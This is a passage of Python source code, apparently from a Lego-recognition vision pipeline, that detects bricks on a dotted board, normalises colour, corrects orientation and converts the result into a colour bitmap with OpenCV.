margin = config.BOARD_RECONSTRUCT_WIDTH // 5
target_points = np.float32([[margin, margin],
[config.BOARD_RECONSTRUCT_WIDTH + margin,
margin], [margin,
config.BOARD_RECONSTRUCT_HEIGHT + margin],
[config.BOARD_RECONSTRUCT_WIDTH + margin,
config.BOARD_RECONSTRUCT_HEIGHT + margin]])
perspective_mtx = cv2.getPerspectiveTransform(corners, target_points)
board_border = cv2.warpPerspective(board_border, perspective_mtx, (
config.BOARD_RECONSTRUCT_WIDTH + margin * 2,
config.BOARD_RECONSTRUCT_HEIGHT + margin * 2),
flags=cv2.INTER_NEAREST)
        # fine adjustment to get a more accurate perspective matrix
corners = get_corner_pts(board_border, method='point')
target_points = np.float32([[0, 0], [config.BOARD_RECONSTRUCT_WIDTH, 0],
[0, config.BOARD_RECONSTRUCT_HEIGHT],
[config.BOARD_RECONSTRUCT_WIDTH,
config.BOARD_RECONSTRUCT_HEIGHT]])
perspective_mtx2 = cv2.getPerspectiveTransform(corners, target_points)
perspective_mtx = np.dot(perspective_mtx2, perspective_mtx)
else:
target_points = np.float32([[0, 0], [config.BOARD_RECONSTRUCT_WIDTH, 0],
[0, config.BOARD_RECONSTRUCT_HEIGHT],
[config.BOARD_RECONSTRUCT_WIDTH,
config.BOARD_RECONSTRUCT_HEIGHT]])
perspective_mtx = cv2.getPerspectiveTransform(corners, target_points)
## convert board to standard size for further processing
# img_board_original = img_board
img_board = cv2.warpPerspective(img_board, perspective_mtx, (
config.BOARD_RECONSTRUCT_WIDTH, config.BOARD_RECONSTRUCT_HEIGHT))
# zc.check_and_display('board', img_board, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
#################### detect Lego on the board ##############################
## locate Lego approach 1: using edges with pre-normalized image,
# edge threshold is also pre-defined
img_lego_u_edge_S, mask_lego_u_edge_S = _detect_lego(img_board,
display_list,
method='edge',
edge_th=[50,
100],
add_color=False)
mask_lego_rough_L = zc.expand(mask_lego_u_edge_S, 21, method='circular',
iterations=2)
mask_lego_rough_S = zc.expand(mask_lego_u_edge_S, 11, method='circular',
iterations=2)
# mask_lego_rough_L_inv = cv2.bitwise_not(mask_lego_rough_L)
mask_lego_rough_S_inv = cv2.bitwise_not(mask_lego_rough_S)
## correct color of board
# find an area that should be grey in general
# area where there are a lot of edges AND area far from the edges of board
mask_grey = np.zeros(
(config.BOARD_RECONSTRUCT_HEIGHT, config.BOARD_RECONSTRUCT_WIDTH),
dtype=np.uint8)
mask_grey[
10: config.BOARD_RECONSTRUCT_HEIGHT - 10,
50: config.BOARD_RECONSTRUCT_WIDTH - 60
] = 255
mask_board = np.zeros(
(config.BOARD_RECONSTRUCT_HEIGHT, config.BOARD_RECONSTRUCT_WIDTH),
dtype=np.uint8)
mask_board[
10: config.BOARD_RECONSTRUCT_HEIGHT - 10,
10: config.BOARD_RECONSTRUCT_WIDTH - 10
] = 255
mask_grey = cv2.bitwise_and(mask_grey, mask_lego_rough_S_inv)
mask_grey_bool = mask_grey.astype(bool)
if not np.any(mask_grey_bool):
# rtn_msg = {'status' : 'fail',
# 'message': 'Cannot find grey area, maybe image blurred'}
# return (rtn_msg, None)
raise NoLEGODetectedError('Cannot find grey area, blurry image?')
if 'board_grey' in display_list:
img_board_grey = np.zeros(img_board.shape, dtype=np.uint8)
img_board_grey = cv2.bitwise_and(img_board, img_board,
dst=img_board_grey, mask=mask_grey)
# zc.check_and_display('board_grey', img_board_grey, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
    ## locate Lego approach 1 continued: refinement using auto-selected
    # edge thresholds
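    # the edge thresholds (presumably used by a Canny-style detector inside
    # _detect_lego) are scaled with the dynamic range of the grey reference
    # area, so lower-contrast images get lower thresholds; the constants
    # appear to be empirical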
bw_board = cv2.cvtColor(img_board, cv2.COLOR_BGR2GRAY)
dynamic_range = bw_board[mask_grey_bool].max() - bw_board[
mask_grey_bool].min()
edge_th = [dynamic_range / 4 + 35, dynamic_range / 2 + 70]
img_lego_u_edge_S, mask_lego_u_edge_S = _detect_lego(img_board,
display_list,
method='edge',
edge_th=edge_th,
add_color=False)
# zc.check_and_display('lego_u_edge_S', img_lego_u_edge_S, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
## locate Lego approach 2: using edges with normalized image
    # the three color-correction steps below are not well studied,
    # but they are kept here for historical reasons...
img_board_n0 = normalize_color(img_board, mask_apply=mask_board,
mask_info=mask_grey, method='grey')
img_board_n0 = normalize_brightness(img_board_n0, mask=mask_board,
method='max')
img_board_n0 = normalize_color(img_board_n0, mask_apply=mask_board,
mask_info=mask_grey, method='hist')
# zc.check_and_display('board_n0', img_board_n0, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
bw_board_n0 = cv2.cvtColor(img_board_n0, cv2.COLOR_BGR2GRAY)
dynamic_range = bw_board_n0[mask_grey_bool].max() - bw_board_n0[
mask_grey_bool].min()
edge_th = [dynamic_range / 4 + 35, dynamic_range / 2 + 70]
img_lego_u_edge_norm_L, mask_lego_u_edge_norm_L = _detect_lego(
img_board_n0, display_list, method='edge', edge_th=edge_th,
add_color=True)
# zc.check_and_display('lego_u_edge_norm_L', img_lego_u_edge_norm_L,
# display_list, wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
## locate Lego approach 3: using dots with pre-normalized image
# black dot detection
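    # the Lego pixels are first painted with the board's mid-grey value so
    # that the DoB response comes only from the board's black dots, not from
    # the Lego itself (DoB is assumed here to be a difference-of-blur /
    # band-pass filter provided by zc)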
mask_lego_bool = mask_lego_u_edge_S.astype(bool)
img_board_tmp = img_board.copy()
img_board_tmp[mask_lego_bool, :] = (int(
bw_board[mask_grey_bool].max()) + int(
bw_board[mask_grey_bool].min())) / 2
DoB = zc.get_DoB(img_board_tmp, 41, 1, method='Average')
DoB[mask_lego_bool] = 0
# DoB[mask_lego_rough_L_inv] = 0
# zc.check_and_display('board_DoB', DoB, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# mask_black = color_inrange(DoB, 'HSV', V_L=config.BD_DOB_MIN_V)
mask_black = LEGOColorDOBMaskBlack.get_mask(DoB)
# zc.check_and_display('board_mask_black', mask_black, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
mask_black_dots, n_cnts = zc.get_small_blobs(mask_black,
max_peri=config.BOARD_BD_MAX_PERI)
if n_cnts < 1000: # some sanity check
# rtn_msg = {'status' : 'fail',
# 'message': 'Too little black dots with more accurate dot '
# 'detection. Image may be blurred'}
# return (rtn_msg, None)
raise NoBoardDetectedError('Too few black dots, blurry image?')
# zc.check_and_display('board_mask_black_dots', mask_black_dots,
# display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
img_lego_u_dots_L, mask_lego_u_dots_L = _detect_lego(
img_board,
display_list,
method='dots',
mask_black_dots=mask_black_dots,
mask_lego_rough=mask_lego_rough_L,
add_color=False)
# zc.check_and_display('lego_u_dots_L', img_lego_u_dots_L, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
## detect colors of Lego
mask_no_black_dots = cv2.bitwise_and(mask_grey,
cv2.bitwise_not(mask_black_dots))
# correct color in different ways
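    # several color-corrected variants of the board are produced below:
    # n1/n2 normalize against the grey area, n3/n4 against the black dots,
    # and n5/n6 against the grey area excluding the black dots; each pair is
    # a color normalization followed by a brightness normalization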
img_board_n1 = normalize_color(img_board, mask_apply=mask_board,
mask_info=mask_grey, method='grey')
img_board_n2 = normalize_brightness(img_board_n1, mask=mask_board,
method='max', max_percentile=95,
min_percentile=1)
img_board_n3 = normalize_color(img_board, mask_apply=mask_board,
mask_info=mask_black_dots, method='grey')
img_board_n4 = normalize_brightness(img_board_n3, mask=mask_board,
method='max', max_percentile=95,
min_percentile=1)
img_board_n5 = normalize_color(img_board, mask_apply=mask_board,
mask_info=mask_no_black_dots, method='grey')
img_board_n6 = normalize_brightness(img_board_n5, mask=mask_board,
method='max', max_percentile=95,
min_percentile=1)
# zc.check_and_display('board_n1', img_board_n1, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# zc.check_and_display('board_n2', img_board_n2, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# zc.check_and_display('board_n3', img_board_n3, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# zc.check_and_display('board_n4', img_board_n4, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# zc.check_and_display('board_n5', img_board_n5, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# zc.check_and_display('board_n6', img_board_n6, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
mask_green, mask_red, mask_yellow, mask_blue = detect_colors(img_board,
mask_lego_u_edge_S)
mask_green_n1, mask_red_n1, mask_yellow_n1, mask_blue_n1 = detect_colors(
img_board_n1, mask_lego_u_edge_S)
mask_green_n3, mask_red_n3, mask_yellow_n3, mask_blue_n3 = detect_colors(
img_board_n3, mask_lego_u_edge_S)
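    # keep only pixels that are flagged as a given color in the original board
    # and in both color-corrected variants (n1, n3), and that also fall inside
    # the Lego mask from the normalized-edge detection; this intersection
    # suppresses spurious color responses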
mask_green = zc.super_bitwise_and(
(mask_green, mask_green_n1, mask_green_n3, mask_lego_u_edge_norm_L))
mask_yellow = zc.super_bitwise_and(
(mask_yellow, mask_yellow_n1, mask_yellow_n3, mask_lego_u_edge_norm_L))
mask_red = zc.super_bitwise_and(
(mask_red, mask_red_n1, mask_red_n3, mask_lego_u_edge_norm_L))
mask_blue = zc.super_bitwise_and(
(mask_blue, mask_blue_n1, mask_blue_n3, mask_lego_u_edge_norm_L))
if 'lego_only_color' in display_list:
color_labels = np.zeros(img_board.shape[0:2], dtype=np.uint8)
color_labels[mask_green.astype(bool)] = 2
color_labels[mask_yellow.astype(bool)] = 3
color_labels[mask_red.astype(bool)] = 4
color_labels[mask_blue.astype(bool)] = 5
img_color = bm.bitmap2syn_img(color_labels)
# zc.check_and_display('lego_only_color', img_color, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
mask_green = zc.expand_with_bound(mask_green, mask_lego_u_dots_L)
mask_yellow = zc.expand_with_bound(mask_yellow, mask_lego_u_dots_L)
mask_red = zc.expand_with_bound(mask_red, mask_lego_u_dots_L)
mask_blue = zc.expand_with_bound(mask_blue, mask_lego_u_dots_L)
    ## add the colored parts back to the Lego to get the Lego with all sides
mask_lego_full = zc.super_bitwise_or(
(mask_green, mask_yellow, mask_red, mask_blue, mask_lego_u_edge_S))
mask_lego_full, _ = zc.find_largest_CC(mask_lego_full,
min_area=config.BOARD_RECONSTRUCT_AREA / 300.0,
min_convex_rate=0.2,
ref_p=config.BOARD_RECONSTRUCT_CENTER,
max_dist_ref_p=config.BOARD_RECONSTRUCT_PERI / 15.0)
if mask_lego_full is None:
# rtn_msg = {'status' : 'fail',
# 'message': 'Cannot find a large enough foreground near
# the '
# 'center of the board after adding all colors '
# 'back to Lego'}
# return (rtn_msg, None, None)
raise NoLEGODetectedError(
'Cannot find a large enough foreground near the '
'center of the board after adding all colors back to Lego')
img_lego_full = np.zeros(img_board.shape, dtype=np.uint8)
img_lego_full = cv2.bitwise_and(img_board, img_board, dst=img_lego_full,
mask=mask_lego_full)
# zc.check_and_display('lego_full', img_lego_full, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
## erode side parts in original view
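    # the full Lego mask, warped back to the original view, still includes the
    # visible side faces of the bricks; eroding it vertically by the brick
    # thickness estimated earlier appears intended to strip the side faces so
    # that roughly only the top surface remains for the bitmap reconstruction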
img_lego_full_original = cv2.warpPerspective(img_lego_full, perspective_mtx,
img.shape[1::-1],
flags=cv2.WARP_INVERSE_MAP)
mask_lego_full_original = zc.get_mask(img_lego_full_original)
    # treat white bricks differently to prevent them from being eroded away
hsv_lego = cv2.cvtColor(img_lego_full_original, cv2.COLOR_BGR2HSV)
# mask_lego_white = detect_color(hsv_lego, 'white')
mask_lego_white = LEGOColorWhite.get_mask(hsv_lego)
mask_lego_white, _ = zc.get_big_blobs(mask_lego_white, min_area=25)
kernel = np.uint8([[0, 0, 0], [0, 1, 0], [0, 1, 0]])
mask_lego = cv2.erode(mask_lego_full_original, kernel, iterations=thickness)
mask_lego = cv2.bitwise_or(mask_lego, mask_lego_white)
mask_lego, _ = zc.find_largest_CC(mask_lego)
if mask_lego is None:
# rtn_msg = {'status' : 'fail',
# 'message': 'Cannot find Lego on the board after eroding '
# 'side parts'}
# return (rtn_msg, None)
raise NoLEGODetectedError('Cannot find Lego on the board after '
'eroding side parts.')
img_lego = np.zeros(img.shape, dtype=np.uint8)
    # note: dst must be pre-initialized (the zeros buffer above); when a mask
    # is given, cv2.bitwise_and leaves the unmasked pixels of dst untouched,
    # so an uninitialized buffer would show up as a random background
    img_lego = cv2.bitwise_and(img, img, dst=img_lego, mask=mask_lego)
img_lego = cv2.warpPerspective(img_lego, perspective_mtx, (
config.BOARD_RECONSTRUCT_WIDTH, config.BOARD_RECONSTRUCT_HEIGHT))
# zc.check_and_display('lego', img_lego, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
return (img_lego, img_lego_full, img_board, (
img_board_n0, img_board_n1, img_board_n2, img_board_n3, img_board_n4,
img_board_n5, img_board_n6), perspective_mtx)
# def _find_lego_noboard(img, stretch_ratio, display_list):
# '''
#     Find Lego without the help of the board (e.g. when the Lego pieces are
#     placed directly on the table).
# Not finished.
# '''
# bw = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# edges = cv2.Canny(bw, 50, 100, apertureSize=3)
# zc.check_and_display('edge', edges, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
# edges_dilated = zc.expand(edges, 3)
#
# mask_lego = np.zeros(img.shape, dtype=np.uint8)
# contours, hierarchy = cv2.findContours(edges_dilated, mode=cv2.RETR_CCOMP,
# method=cv2.CHAIN_APPROX_NONE)
# for cnt_idx, cnt in enumerate(contours):
# if hierarchy[0, cnt_idx, 3] == -1:
# continue
# mask_tmp = np.zeros(bw.shape, dtype=np.uint8)
# cv2.drawContours(mask_tmp, contours, cnt_idx, 255, -1)
# mask_tmp = zc.expand(mask_tmp, 3)
# contours_tmp, hierarchy_tmp = cv2.findContours(mask_tmp,
# mode=cv2.RETR_CCOMP,
# method=cv2.CHAIN_APPROX_NONE)
# cnt_tmp = contours_tmp[0]
# mask_tmp = np.zeros(bw.shape, dtype=np.uint8)
# cv2.drawContours(mask_tmp, [cnt_tmp], 0, 255, 1)
# cv2.drawContours(mask_lego, contours, cnt_idx, [255, 255, 255], -1)
#
# lines = cv2.HoughLinesP(mask_tmp, 1, np.pi / 180, 3, minLineLength=4,
# maxLineGap=1)
# if lines is None:
# continue
# lines = lines[0]
# for line in lines:
# pt1 = (line[0], line[1])
# pt2 = (line[2], line[3])
# cv2.line(mask_lego, pt1, pt2, (0, 0, 255), 1)
#
# line_groups = []
# for line in lines:
# merge_flag = False
# for line_group in line_groups:
# print((is_line_seg_close(line_group, line),
# is_line_seg_close2(line_group, line)))
#             if is_line_seg_close(line_group, line) and is_line_seg_close2(
#                     line_group, line):
# merge_flag = True
# line_group_new = line_group.copy()
# line_group_new[0] = min(line_group[0], line_group[2],
# line[0], line[2])
# line_group_new[1] = min(line_group[1], line_group[3],
# line[1], line[3])
# line_group_new[2] = max(line_group[0], line_group[2],
# line[0], line[2])
# line_group_new[3] = max(line_group[1], line_group[3],
# line[1], line[3])
# line_group[0] = line_group_new[0]
# line_group[1] = line_group_new[1]
# line_group[2] = line_group_new[2]
# line_group[3] = line_group_new[3]
# if not merge_flag:
# line_groups.append(line)
# for line in line_groups:
# pt1 = (line[0], line[1])
# pt2 = (line[2], line[3])
# cv2.line(mask_lego, pt1, pt2, (0, 255, 0), 1)
#
# zc.check_and_display('edge_inv', mask_lego, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
#
# rtn_msg = {'status': 'fail', 'message': 'nothing'}
# return (rtn_msg, None)
def _correct_orientation(img_lego, img_lego_full, display_list):
objects = rotate(img_lego)
img_lego_correct, rotation_degree, rotation_mtx = objects
objects = rotate(img_lego_full)
img_lego_full_correct, rotation_degree_full, rotation_mtx = objects
# print (rotation_degree, rotation_degree_full)
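    # blend the angle estimated from the eroded top-surface image with the one
    # from the full Lego image (60/40); presumably a compromise between the
    # cleaner but smaller top-surface region and the noisier full silhouette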
rotation_degree = rotation_degree * 0.6 + rotation_degree_full * 0.4
rotation_mtx = cv2.getRotationMatrix2D(
(img_lego.shape[1] / 2, img_lego.shape[0] / 2), rotation_degree,
scale=1)
img_lego_correct = cv2.warpAffine(img_lego, rotation_mtx,
(img_lego.shape[1], img_lego.shape[0]))
img_lego_full_correct = cv2.warpAffine(img_lego_full, rotation_mtx, (
img_lego.shape[1], img_lego.shape[0]))
# zc.check_and_display('lego_correct', img_lego_correct, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_max=config.DISPLAY_MAX_PIXEL,
# save_image=config.SAVE_IMAGE)
return img_lego_correct, img_lego_full_correct, rotation_mtx
# def _get_rectangular_area(img_board, img_correct, rotation_mtx, display_list):
# img_shape = img_correct.shape
# img_cropped, borders = crop(img_correct, None)
# min_row, max_row, min_col, max_col = borders
# mask_rect = np.zeros(img_correct.shape[0:2], dtype=np.uint8)
# mask_rect[min_row: max_row + 1, min_col: max_col + 1] = 255
# mask_rect = cv2.warpAffine(mask_rect, rotation_mtx,
# (img_shape[1], img_shape[0]),
# flags=cv2.WARP_INVERSE_MAP)
#
# img_lego_rect = np.zeros(img_board.shape, dtype=np.uint8)
# img_lego_rect = cv2.bitwise_and(img_board, img_board, dst=img_lego_rect,
# mask=mask_rect)
# img_lego_rect = cv2.warpAffine(img_lego_rect, rotation_mtx,
# (img_shape[1], img_shape[0]))
#
# # zc.check_and_display('lego_rect', img_lego_rect, display_list,
# # wait_time=config.DISPLAY_WAIT_TIME,
# # resize_max=config.DISPLAY_MAX_PIXEL,
# # save_image=config.SAVE_IMAGE)
#
# rtn_msg = {'status': 'success'}
# return rtn_msg, img_lego_rect
def _img2bitmap(img, color_cumsums, n_rows, n_cols, lego_color):
height, width, _ = img.shape
img_plot = None
bitmap = np.zeros((n_rows, n_cols), dtype=int)
best_ratio = 0
best_bitmap = None
best_plot = None
best_offset = None
offset_range = {'t': 0,
'b': int(round(config.BRICK_HEIGHT / 3)),
'l': int(round(config.BRICK_WIDTH / 3)),
'r': int(round(config.BRICK_WIDTH / 3))}
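    # brute-force search over small border offsets (in 2-pixel steps) so that
    # the n_rows x n_cols block grid lines up with the bricks; the best offset
    # is the one that maximizes the per-block color agreement computed below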
for height_offset_t in range(0, offset_range['t'] + 1, 2):
for height_offset_b in range(0, offset_range['b'] + 1, 2):
for width_offset_l in range(0, offset_range['l'] + 1, 2):
for width_offset_r in range(0, offset_range['r'] + 1, 2):
if 'plot_line' in config.DISPLAY_LIST:
if lego_color is not None:
img_plot = lego_color.copy()
else:
img_plot = img.copy()
test_height = height - height_offset_t - height_offset_b
test_width = width - width_offset_l - width_offset_r
block_height = float(test_height) / n_rows
block_width = float(test_width) / n_cols
n_pixels = test_height * test_width
n_pixels_center = 0
n_good_pixels = 0
n_good_pixels_center = 0
worst_ratio_block = 1 # set to maximum
for i in range(n_rows):
i_start = int(round(block_height * i)) + height_offset_t
i_end = int(
round(block_height * (i + 1))) + height_offset_t
for j in range(n_cols):
j_start = int(
round(block_width * j)) + width_offset_l
j_end = int(
round(block_width * (j + 1))) + width_offset_l
if 'plot_line' in config.DISPLAY_LIST:
cv2.line(img_plot, (j_end, 0),
(j_end, height - 1), (255, 255, 0), 1)
cv2.line(img_plot, (0, i_end),
(width - 1, i_end), (255, 255, 0), 1)
cv2.line(img_plot, (j_start, 0),
(j_start, height - 1), (255, 255, 0),
1)
cv2.line(img_plot, (0, i_start),
(width - 1, i_start), (255, 255, 0), 1)
color_sum = {}
for color_key, color_cumsum in \
color_cumsums.items():
# focus more on center part
color_sum[color_key] = \
color_cumsum[
i_end - config.BLOCK_DETECTION_OFFSET,
j_end - config.BLOCK_DETECTION_OFFSET] \
- color_cumsum[
i_start + config.BLOCK_DETECTION_OFFSET,
j_end - config.BLOCK_DETECTION_OFFSET] \
- color_cumsum[
i_end - config.BLOCK_DETECTION_OFFSET,
j_start +
config.BLOCK_DETECTION_OFFSET] \
+ color_cumsum[
i_start + config.BLOCK_DETECTION_OFFSET,
j_start + config.BLOCK_DETECTION_OFFSET]
counts = [color_sum['nothing'], color_sum['white'],
color_sum['green'], color_sum['yellow'],
color_sum['red'], color_sum['blue'],
color_sum['black'], color_sum['unsure']]
color_idx = np.argmax(counts[:-1])
bitmap[i, j] = color_idx
# percentage correct for center part of block
n_pixels_block_center = sum(counts)
ratio_block_center = \
float(counts[color_idx]) / n_pixels_block_center
n_pixels_center += n_pixels_block_center
n_good_pixels_center += counts[color_idx]
color_cumsum = color_cumsums[
config.COLOR_ORDER[color_idx]]
n_good_pixels_block = color_cumsum[i_end, j_end] \
- color_cumsum[i_start,
j_end] \
- color_cumsum[i_end,
j_start] \
+ color_cumsum[
i_start, j_start]
color_cumsum = color_cumsums['unsure']
n_good_pixels_block += \
(color_cumsum[i_end, j_end]
- color_cumsum[i_start, j_end]
- color_cumsum[i_end, j_start]
+ color_cumsum[i_start, j_start]) / 2.0
# unsure pixels are half right
n_good_pixels += n_good_pixels_block
n_pixels_block = \
(j_end - j_start) * (i_end - i_start)
# percentage correct for entire block
ratio_block = n_good_pixels_block / n_pixels_block
if config.OPT_NOTHING and color_idx == 0:
ratio_block *= 0.9
ratio_block = ratio_block * 0.34 + \
ratio_block_center * 0.66
if ratio_block < worst_ratio_block:
worst_ratio_block = ratio_block
ratio = float(n_good_pixels) / n_pixels * 0.34 + float(
n_good_pixels_center) / n_pixels_center * 0.66
# print "worst ratio within block: %f" % worst_ratio_block
if worst_ratio_block > config.WORST_RATIO_BLOCK_THRESH \
and ratio > best_ratio:
best_ratio = ratio
best_bitmap = bitmap.copy()
best_plot = img_plot
best_offset = (
height_offset_t, height_offset_b, width_offset_l,
width_offset_r)
return best_bitmap, best_ratio, best_plot, best_offset
def _reconstruct_lego(img_lego, img_board, img_board_ns, rotation_mtx,
display_list):
def _lego_outof_board(mask_lego, img_board, rotation_mtx, borders):
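        # cut the Lego region out of a (color-corrected) board image, rotate
        # it upright, and crop it; the first call computes the crop borders
        # (via smart_crop) and later calls reuse them so all variants stay
        # aligned with each other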
img_lego = np.zeros(img_board.shape, dtype=np.uint8)
img_lego = cv2.bitwise_and(img_board, img_board, dst=img_lego,
mask=mask_lego)
img_lego = cv2.warpAffine(img_lego, rotation_mtx,
(img_board.shape[1], img_board.shape[0]))
if borders is None:
img_lego, borders = crop(img_lego, None)
min_row, max_row, min_col, max_col = borders
img_lego, borders = smart_crop(img_lego)
i_start, i_end, j_start, j_end = borders
borders = (min_row + i_start, min_row + i_end, min_col + j_start,
min_col + j_end)
else:
img_lego, borders = crop(img_lego, borders)
return img_lego, borders
## get Lego images that are color-corrected in different ways
img_board_n0, img_board_n1, img_board_n2, img_board_n3, img_board_n4, \
img_board_n5, img_board_n6 = img_board_ns
mask_lego = zc.get_mask(img_lego)
img_lego, borders = _lego_outof_board(mask_lego, img_board, rotation_mtx,
None)
img_lego_n0, borders = _lego_outof_board(mask_lego, img_board_n0,
rotation_mtx, borders)
img_lego_n1, borders = _lego_outof_board(mask_lego, img_board_n1,
rotation_mtx, borders)
img_lego_n2, borders = _lego_outof_board(mask_lego, img_board_n2,
rotation_mtx, borders)
img_lego_n3, borders = _lego_outof_board(mask_lego, img_board_n3,
rotation_mtx, borders)
img_lego_n4, borders = _lego_outof_board(mask_lego, img_board_n4,
rotation_mtx, borders)
img_lego_n5, borders = _lego_outof_board(mask_lego, img_board_n5,
rotation_mtx, borders)
img_lego_n6, borders = _lego_outof_board(mask_lego, img_board_n6,
rotation_mtx, borders)
# zc.check_and_display('lego_cropped', img_lego, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_scale=config.DISPLAY_SCALE,
# save_image=config.SAVE_IMAGE)
## detect colors: green, red, yellow, blue
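    # with on_surface=True, detect_colors presumably returns a pair of masks
    # per color: index [0] for all pixels of that color and index [1] for the
    # pixels judged to be on the top surface (see the [0]/[1] usage below)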
mask_green, mask_red, mask_yellow, mask_blue = detect_colors(img_lego, None,
on_surface=True)
mask_green_n1, mask_red_n1, mask_yellow_n1, mask_blue_n1 = detect_colors(
img_lego_n1, None, on_surface=True)
mask_green_n3, mask_red_n3, mask_yellow_n3, mask_blue_n3 = detect_colors(
img_lego_n3, None, on_surface=True)
mask_green_on = zc.super_bitwise_and(
(mask_green[1], mask_green_n1[1], mask_green_n3[1]))
mask_yellow_on = zc.super_bitwise_and(
(mask_yellow[1], mask_yellow_n1[1], mask_yellow_n3[1]))
mask_red_on = zc.super_bitwise_and(
(mask_red[1], mask_red_n1[1], mask_red_n3[1]))
mask_blue_on = zc.super_bitwise_and(
(mask_blue[1], mask_blue_n1[1], mask_blue_n3[1]))
mask_green_all = zc.super_bitwise_and(
(mask_green[0], mask_green_n1[0], mask_green_n3[0]))
mask_yellow_all = zc.super_bitwise_and(
(mask_yellow[0], mask_yellow_n1[0], mask_yellow_n3[0]))
mask_red_all = zc.super_bitwise_and(
(mask_red[0], mask_red_n1[0], mask_red_n3[0]))
mask_blue_all = zc.super_bitwise_and(
(mask_blue[0], mask_blue_n1[0], mask_blue_n3[0]))
mask_colors = zc.super_bitwise_or(
(mask_green_all, mask_yellow_all, mask_red_all, mask_blue_all))
mask_colors_inv = cv2.bitwise_not(mask_colors)
## detect black and white
hsv_lego_dark = cv2.cvtColor(img_lego_n4, cv2.COLOR_BGR2HSV)
hsv_lego_bright = cv2.cvtColor(img_lego_n3, cv2.COLOR_BGR2HSV)
# special mask for black
# mask_black = detect_color((hsv_lego_dark, hsv_lego_bright), 'black')
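    # a pixel is treated as black if it is dark in the dark-normalized image
    # (n4) and unsaturated in the bright-normalized one (n3); two HSV
    # threshold pairs are OR-ed together below (the thresholds look empirical)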
mask1_1 = SimpleHSVColor(low_bound=HSVValue(0, 0, 0),
high_bound=HSVValue(359, 100, 20))
mask1_2 = SimpleHSVColor(low_bound=HSVValue(0, 0, 0),
high_bound=HSVValue(359, 25, 100))
mask2_1 = SimpleHSVColor(low_bound=HSVValue(0, 0, 0),
high_bound=HSVValue(359, 100, 45))
mask2_2 = SimpleHSVColor(low_bound=HSVValue(0, 0, 0),
high_bound=HSVValue(359, 40, 100))
mask1 = cv2.bitwise_and(mask1_1.get_mask(hsv_lego_dark),
mask1_2.get_mask(hsv_lego_bright))
mask2 = cv2.bitwise_and(mask2_1.get_mask(hsv_lego_dark),
mask2_2.get_mask(hsv_lego_bright))
mask_black = cv2.bitwise_or(mask1, mask2)
hsv_lego = cv2.cvtColor(img_lego_n6, cv2.COLOR_BGR2HSV)
# mask_white = detect_color(hsv_lego, 'white')
mask_white = LEGOColorWhite.get_mask(hsv_lego)
mask_black = cv2.bitwise_and(mask_black, mask_colors_inv)
mask_white = cv2.bitwise_and(mask_white, mask_colors_inv)
white, green, red, yellow, blue, black = zc.mask2bool((mask_white,
mask_green_on,
mask_red_on,
mask_yellow_on,
mask_blue_on,
mask_black))
nothing = np.bitwise_and(
np.bitwise_and(img_lego[:, :, 0] == 0, img_lego[:, :, 1] == 0),
img_lego[:, :, 2] == 0)
black = np.bitwise_and(black, np.invert(nothing))
unsure = np.invert(
zc.super_bitwise_or((nothing, white, green, red, yellow, blue, black)))
## calculate cumulative sum for color pixels to speed up sum operation
nothing_cumsum = zc.calc_cumsum(nothing)
white_cumsum = zc.calc_cumsum(white)
green_cumsum = zc.calc_cumsum(green)
yellow_cumsum = zc.calc_cumsum(yellow)
red_cumsum = zc.calc_cumsum(red)
blue_cumsum = zc.calc_cumsum(blue)
black_cumsum = zc.calc_cumsum(black)
unsure_cumsum = zc.calc_cumsum(unsure)
color_cumsums = {'nothing': nothing_cumsum,
'white' : white_cumsum,
'green' : green_cumsum,
'yellow' : yellow_cumsum,
'red' : red_cumsum,
'blue' : blue_cumsum,
'black' : black_cumsum,
